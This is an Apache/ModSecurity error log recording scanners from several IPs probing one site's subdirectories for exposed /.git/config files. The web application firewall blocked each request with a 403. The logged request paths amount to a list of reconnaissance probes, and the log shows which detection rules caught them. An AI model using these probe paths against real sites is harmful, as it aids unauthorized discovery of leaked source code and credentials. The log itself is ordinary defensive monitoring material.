[Tue Jan 16 09:53:42.562881 2024] [:error] [pid 387095] [client 54.81.152.73:32918] [client 54.81.152.73] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /build/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/build/.git/config"] [unique_id "ZaZEFom1Wzs40p_Gyd-i4wAAAAI"]
[Tue Jan 16 09:53:42.563222 2024] [:error] [pid 387095] [client 54.81.152.73:32918] [client 54.81.152.73] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/build/.git/config"] [unique_id "ZaZEFom1Wzs40p_Gyd-i4wAAAAI"]
[Tue Jan 16 09:53:42.563406 2024] [:error] [pid 387095] [client 54.81.152.73:32918] [client 54.81.152.73] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/build/.git/config"] [unique_id "ZaZEFom1Wzs40p_Gyd-i4wAAAAI"]
[Tue Jan 16 10:11:38.754756 2024] [:error] [pid 387094] [client 54.81.152.73:44340] [client 54.81.152.73] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /client/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/client/.git/config"] [unique_id "ZaZISsRL1-E6Wwu1PjBYjwAAAAE"]
[Tue Jan 16 10:11:38.755263 2024] [:error] [pid 387094] [client 54.81.152.73:44340] [client 54.81.152.73] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/client/.git/config"] [unique_id "ZaZISsRL1-E6Wwu1PjBYjwAAAAE"]
[Tue Jan 16 10:11:38.755502 2024] [:error] [pid 387094] [client 54.81.152.73:44340] [client 54.81.152.73] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/client/.git/config"] [unique_id "ZaZISsRL1-E6Wwu1PjBYjwAAAAE"]
[Tue Jan 16 10:36:19.080211 2024] [:error] [pid 387096] [client 54.81.152.73:57722] [client 54.81.152.73] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/.git/config"] [unique_id "ZaZOE2kd47Dr3x-riChamwAAAAM"]
[Tue Jan 16 10:36:19.080517 2024] [:error] [pid 387096] [client 54.81.152.73:57722] [client 54.81.152.73] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/.git/config"] [unique_id "ZaZOE2kd47Dr3x-riChamwAAAAM"]
[Tue Jan 16 10:36:19.080683 2024] [:error] [pid 387096] [client 54.81.152.73:57722] [client 54.81.152.73] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/.git/config"] [unique_id "ZaZOE2kd47Dr3x-riChamwAAAAM"]
[Tue Jan 16 10:48:06.385031 2024] [:error] [pid 387094] [client 54.81.152.73:59006] [client 54.81.152.73] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /modules/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/modules/.git/config"] [unique_id "ZaZQ1sRL1-E6Wwu1PjBYkgAAAAE"]
[Tue Jan 16 10:48:06.385330 2024] [:error] [pid 387094] [client 54.81.152.73:59006] [client 54.81.152.73] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/modules/.git/config"] [unique_id "ZaZQ1sRL1-E6Wwu1PjBYkgAAAAE"]
[Tue Jan 16 10:48:06.385495 2024] [:error] [pid 387094] [client 54.81.152.73:59006] [client 54.81.152.73] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/modules/.git/config"] [unique_id "ZaZQ1sRL1-E6Wwu1PjBYkgAAAAE"]
[Tue Jan 16 11:16:11.790094 2024] [:error] [pid 387098] [client 54.81.152.73:39568] [client 54.81.152.73] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /home/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/home/.git/config"] [unique_id "ZaZXayPJwNpl4LQy5j3TgAAAAAU"]
[Tue Jan 16 11:16:11.790425 2024] [:error] [pid 387098] [client 54.81.152.73:39568] [client 54.81.152.73] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/home/.git/config"] [unique_id "ZaZXayPJwNpl4LQy5j3TgAAAAAU"]
[Tue Jan 16 11:16:11.790705 2024] [:error] [pid 387098] [client 54.81.152.73:39568] [client 54.81.152.73] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/home/.git/config"] [unique_id "ZaZXayPJwNpl4LQy5j3TgAAAAAU"]
[Tue Jan 16 11:36:20.483874 2024] [:error] [pid 387098] [client 54.81.152.73:49776] [client 54.81.152.73] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /images/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/images/.git/config"] [unique_id "ZaZcJCPJwNpl4LQy5j3TgQAAAAU"]
[Tue Jan 16 11:36:20.484174 2024] [:error] [pid 387098] [client 54.81.152.73:49776] [client 54.81.152.73] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/images/.git/config"] [unique_id "ZaZcJCPJwNpl4LQy5j3TgQAAAAU"]
[Tue Jan 16 11:36:20.484350 2024] [:error] [pid 387098] [client 54.81.152.73:49776] [client 54.81.152.73] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/images/.git/config"] [unique_id "ZaZcJCPJwNpl4LQy5j3TgQAAAAU"]
[Tue Jan 16 12:01:35.018122 2024] [:error] [pid 387096] [client 54.81.152.73:48014] [client 54.81.152.73] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /public/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/public/.git/config"] [unique_id "ZaZiD2kd47Dr3x-riChanwAAAAM"]
[Tue Jan 16 12:01:35.018449 2024] [:error] [pid 387096] [client 54.81.152.73:48014] [client 54.81.152.73] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/public/.git/config"] [unique_id "ZaZiD2kd47Dr3x-riChanwAAAAM"]
[Tue Jan 16 12:01:35.018669 2024] [:error] [pid 387096] [client 54.81.152.73:48014] [client 54.81.152.73] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/public/.git/config"] [unique_id "ZaZiD2kd47Dr3x-riChanwAAAAM"]
[Tue Jan 16 19:19:02.084739 2024] [:error] [pid 387094] [client 35.86.96.42:44988] [client 35.86.96.42] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /core/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/core/.git/config"] [unique_id "ZabIlsRL1-E6Wwu1PjBYqQAAAAE"]
[Tue Jan 16 19:19:02.085066 2024] [:error] [pid 387094] [client 35.86.96.42:44988] [client 35.86.96.42] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/core/.git/config"] [unique_id "ZabIlsRL1-E6Wwu1PjBYqQAAAAE"]
[Tue Jan 16 19:19:02.085253 2024] [:error] [pid 387094] [client 35.86.96.42:44988] [client 35.86.96.42] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/core/.git/config"] [unique_id "ZabIlsRL1-E6Wwu1PjBYqQAAAAE"]
[Tue Jan 16 19:30:26.564351 2024] [:error] [pid 387098] [client 35.86.96.42:37026] [client 35.86.96.42] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /node_modules/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/node_modules/.git/config"] [unique_id "ZabLQiPJwNpl4LQy5j3TmgAAAAU"]
[Tue Jan 16 19:30:26.564676 2024] [:error] [pid 387098] [client 35.86.96.42:37026] [client 35.86.96.42] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/node_modules/.git/config"] [unique_id "ZabLQiPJwNpl4LQy5j3TmgAAAAU"]
[Tue Jan 16 19:30:26.564895 2024] [:error] [pid 387098] [client 35.86.96.42:37026] [client 35.86.96.42] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/node_modules/.git/config"] [unique_id "ZabLQiPJwNpl4LQy5j3TmgAAAAU"]
[Tue Jan 16 19:43:54.653480 2024] [:error] [pid 387093] [client 35.86.96.42:51202] [client 35.86.96.42] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /system/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/system/.git/config"] [unique_id "ZabOasoo9DZ73RBFPcGoyQAAAAA"]
[Tue Jan 16 19:43:54.653772 2024] [:error] [pid 387093] [client 35.86.96.42:51202] [client 35.86.96.42] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/system/.git/config"] [unique_id "ZabOasoo9DZ73RBFPcGoyQAAAAA"]
[Tue Jan 16 19:43:54.653969 2024] [:error] [pid 387093] [client 35.86.96.42:51202] [client 35.86.96.42] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/system/.git/config"] [unique_id "ZabOasoo9DZ73RBFPcGoyQAAAAA"]
[Tue Jan 16 20:16:54.531556 2024] [:error] [pid 387094] [client 35.86.96.42:53576] [client 35.86.96.42] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /client/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/client/.git/config"] [unique_id "ZabWJsRL1-E6Wwu1PjBYrAAAAAE"]
[Tue Jan 16 20:16:54.531838 2024] [:error] [pid 387094] [client 35.86.96.42:53576] [client 35.86.96.42] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/client/.git/config"] [unique_id "ZabWJsRL1-E6Wwu1PjBYrAAAAAE"]
[Tue Jan 16 20:16:54.532019 2024] [:error] [pid 387094] [client 35.86.96.42:53576] [client 35.86.96.42] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/client/.git/config"] [unique_id "ZabWJsRL1-E6Wwu1PjBYrAAAAAE"]
[Tue Jan 16 20:44:04.772282 2024] [:error] [pid 387094] [client 35.86.96.42:46356] [client 35.86.96.42] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /build/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/build/.git/config"] [unique_id "ZabchMRL1-E6Wwu1PjBYrgAAAAE"]
[Tue Jan 16 20:44:04.772559 2024] [:error] [pid 387094] [client 35.86.96.42:46356] [client 35.86.96.42] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/build/.git/config"] [unique_id "ZabchMRL1-E6Wwu1PjBYrgAAAAE"]
[Tue Jan 16 20:44:04.772740 2024] [:error] [pid 387094] [client 35.86.96.42:46356] [client 35.86.96.42] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/build/.git/config"] [unique_id "ZabchMRL1-E6Wwu1PjBYrgAAAAE"]
[Tue Jan 16 21:01:17.625509 2024] [:error] [pid 387451] [client 35.86.96.42:57662] [client 35.86.96.42] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /src/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/src/.git/config"] [unique_id "ZabgjVniPdzbU2t_Q6n7OwAAAAY"]
[Tue Jan 16 21:01:17.625907 2024] [:error] [pid 387451] [client 35.86.96.42:57662] [client 35.86.96.42] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/src/.git/config"] [unique_id "ZabgjVniPdzbU2t_Q6n7OwAAAAY"]
[Tue Jan 16 21:01:17.626101 2024] [:error] [pid 387451] [client 35.86.96.42:57662] [client 35.86.96.42] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/src/.git/config"] [unique_id "ZabgjVniPdzbU2t_Q6n7OwAAAAY"]
[Fri Jan 19 04:43:47.840473 2024] [authz_core:error] [pid 457653] [client 139.84.145.2:37254] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/.git
[Fri Jan 19 06:11:32.574338 2024] [:error] [pid 458286] [client 139.84.145.2:38762] [client 139.84.145.2] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /plugins/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/plugins/.git/config"] [unique_id "ZaoEhCew--ROYwWR4d2PgwAAAAo"]
